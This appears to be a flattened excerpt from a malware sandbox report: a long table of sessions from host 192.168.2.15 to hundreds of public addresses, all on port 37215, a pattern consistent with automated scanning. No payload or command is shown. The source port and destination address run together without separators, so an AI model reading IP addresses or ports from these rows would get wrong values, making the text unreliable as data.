                                                                            15337192.168.2.154758441.91.11.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15338192.168.2.155064441.183.142.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15339192.168.2.154808841.218.25.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15340192.168.2.154598641.66.207.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15341192.168.2.155322641.159.113.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15342192.168.2.153717241.98.40.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15343192.168.2.155123441.231.174.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15344192.168.2.155940441.192.142.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15345192.168.2.153567241.167.120.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15346192.168.2.154037641.33.34.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15347192.168.2.1550152156.152.55.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15348192.168.2.1548784156.227.240.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15349192.168.2.1555114156.24.138.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15350192.168.2.1554292156.2.100.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15351192.168.2.1532976156.166.235.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15352192.168.2.1537862156.67.59.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15353192.168.2.1550164156.106.4.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15354192.168.2.1541426156.112.16.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15355192.168.2.1556686156.177.200.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15356192.168.2.1537072156.5.90.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15357192.168.2.1556718156.195.197.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15358192.168.2.1540052156.189.97.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15359192.168.2.1544654156.57.245.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15360192.168.2.1537986156.175.127.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15361192.168.2.1546890156.24.135.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15362192.168.2.1543450156.85.172.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15363192.168.2.1534382156.212.6.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15364192.168.2.1533294156.138.112.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15365192.168.2.1546922156.200.66.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15366192.168.2.1547510156.55.110.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15367192.168.2.1551868156.150.229.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15368192.168.2.1540682156.3.196.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15369192.168.2.1554462156.211.0.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15370192.168.2.1549732156.123.24.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15371192.168.2.1548078156.192.166.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15372192.168.2.1548832156.145.205.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15373192.168.2.1547646156.189.160.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15374192.168.2.1540682156.86.230.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15375192.168.2.1543310156.80.226.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15376192.168.2.1535204156.206.50.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15377192.168.2.1537384156.15.65.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15378192.168.2.1543182156.120.53.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15379192.168.2.1557352156.31.158.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15380192.168.2.1558386156.185.169.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15381192.168.2.1543120156.115.21.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15382192.168.2.1549938156.23.157.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15383192.168.2.1544280156.127.42.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15384192.168.2.1538676156.160.178.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15385192.168.2.1542046156.28.104.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15386192.168.2.1548500156.145.144.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15387192.168.2.1560266156.88.226.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15388192.168.2.1560258156.177.103.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15389192.168.2.1541396156.130.236.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15390192.168.2.1551578156.11.112.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15391192.168.2.1540716156.85.249.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15392192.168.2.1548214156.227.89.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15393192.168.2.1557238156.27.167.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15394192.168.2.1548522156.140.131.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15395192.168.2.1560076156.94.145.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15396192.168.2.1538080156.247.65.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15397192.168.2.1559866156.181.59.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15398192.168.2.1544248156.14.135.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15399192.168.2.1541704156.229.17.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15400192.168.2.1539448156.75.138.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15401192.168.2.1543396156.115.58.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15402192.168.2.1559110156.98.245.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15403192.168.2.1535590156.141.123.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15404192.168.2.1555316156.232.23.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15405192.168.2.1555860156.79.3.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15406192.168.2.1539208156.19.230.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15407192.168.2.1560768156.230.149.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15408192.168.2.1534178156.196.113.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15409192.168.2.1538690156.109.129.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15410192.168.2.1542466156.115.93.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15411192.168.2.1535874156.19.83.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15412192.168.2.1558868156.178.242.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15413192.168.2.1553242156.89.191.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15414192.168.2.1554588156.45.222.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15415192.168.2.1547710156.228.170.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15416192.168.2.1541898156.98.85.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15417192.168.2.1538284156.180.211.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15418192.168.2.1553428156.141.177.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15419192.168.2.1558878156.235.50.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15420192.168.2.1558486156.31.13.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15421192.168.2.1552078156.157.23.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15422192.168.2.1552872156.176.164.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15423192.168.2.1555112156.71.159.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15424192.168.2.1549102156.24.143.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15425192.168.2.1560566156.92.27.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15426192.168.2.1535782156.206.175.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15427192.168.2.1533922156.31.139.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15428192.168.2.1560550156.44.113.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15429192.168.2.1550134156.16.153.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15430192.168.2.1533222156.209.220.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15431192.168.2.1539808156.105.219.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15432192.168.2.1548732156.205.33.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15433192.168.2.1552316156.23.65.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15434192.168.2.1559974156.177.102.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15435192.168.2.1548560156.177.108.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15436192.168.2.1547540156.255.238.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15437192.168.2.1536954156.83.34.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15438192.168.2.1545050156.140.140.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15439192.168.2.1552882156.164.177.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15440192.168.2.1556300156.26.126.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15441192.168.2.1544690156.182.80.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15442192.168.2.1552706156.150.23.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15443192.168.2.1555576156.228.191.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15444192.168.2.1553466156.88.42.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15445192.168.2.1547732156.35.73.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15446192.168.2.1548156156.211.235.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15447192.168.2.1549164156.178.179.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15448192.168.2.1546012156.26.118.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15449192.168.2.1542602156.89.113.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15450192.168.2.1553028156.198.160.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15451192.168.2.1551872156.216.153.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15452192.168.2.1555386156.184.230.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15453192.168.2.1539080156.254.113.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15454192.168.2.1546662156.85.29.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15455192.168.2.1549722156.33.152.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15456192.168.2.1542112156.133.74.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15457192.168.2.1559922156.114.119.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15458192.168.2.1547130156.170.227.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15459192.168.2.1552652156.133.241.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15460192.168.2.1547298156.164.11.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15461192.168.2.1537106156.210.120.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15462192.168.2.1552786156.73.13.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15463192.168.2.1554620156.218.146.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15464192.168.2.1539990156.228.67.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15465192.168.2.1556048156.127.129.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15466192.168.2.1548976156.181.217.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15467192.168.2.1534040156.205.115.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15468192.168.2.1536348156.1.248.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15469192.168.2.1547338156.104.79.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15470192.168.2.1541122156.135.196.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15471192.168.2.1555722156.194.66.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15472192.168.2.1554384156.84.82.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15473192.168.2.1537416156.253.180.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15474192.168.2.1536868156.10.45.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15475192.168.2.1546854156.192.226.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15476192.168.2.1550846156.178.67.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15477192.168.2.1552370156.5.65.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15478192.168.2.1541552156.138.222.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15479192.168.2.1554916156.218.87.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15480192.168.2.1541470156.117.122.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15481192.168.2.1546258156.235.117.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15482192.168.2.1550406156.63.229.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15483192.168.2.1543882156.143.42.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15484192.168.2.1538876156.200.142.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15485192.168.2.1534754156.130.144.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15486192.168.2.1555716156.191.56.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15487192.168.2.1533822156.34.154.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15488192.168.2.1539892156.91.168.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15489192.168.2.1541930156.32.66.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15490192.168.2.1543676156.114.73.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15491192.168.2.1557156156.191.54.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15492192.168.2.1555100156.45.201.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15493192.168.2.1549498156.52.224.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15494192.168.2.1554722156.144.129.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15495192.168.2.1537450156.98.139.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15496192.168.2.1549726156.18.114.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15497192.168.2.1551814156.98.86.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15498192.168.2.1555066156.96.248.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15499192.168.2.1557754156.43.223.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15500192.168.2.1541168156.34.46.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15501192.168.2.1535754156.47.55.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15502192.168.2.1549920156.146.186.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15503192.168.2.1536306156.78.109.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15504192.168.2.1534134156.155.58.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15505192.168.2.1542844156.199.83.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15506192.168.2.1545880156.137.168.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15507192.168.2.1556250156.250.40.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15508192.168.2.1550722156.73.182.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15509192.168.2.1559314156.180.98.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15510192.168.2.1543318156.172.220.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15511192.168.2.1554802156.187.212.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15512192.168.2.1555748156.229.30.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15513192.168.2.1548262156.43.189.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15514192.168.2.1545954156.212.174.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15515192.168.2.1542360156.126.147.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15516192.168.2.1558150156.225.155.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15517192.168.2.1549596156.11.253.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15518192.168.2.1537162156.124.230.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15519192.168.2.1554134156.72.174.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15520192.168.2.1543118156.99.219.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15521192.168.2.1553942156.129.144.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15522192.168.2.1551548156.123.1.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15523192.168.2.1541372156.148.109.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15524192.168.2.1543864156.52.81.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15525192.168.2.1546946156.47.47.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15526192.168.2.1550620156.82.6.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15527192.168.2.1545712156.173.68.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15528192.168.2.1544208156.135.87.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15529192.168.2.1556300156.101.62.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15530192.168.2.1541974156.101.215.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15531192.168.2.1536696156.249.200.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15532192.168.2.1548256156.202.220.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15533192.168.2.1560342156.75.35.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15534192.168.2.1546444156.58.119.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15535192.168.2.1557162156.121.24.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15536192.168.2.1549956156.246.249.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
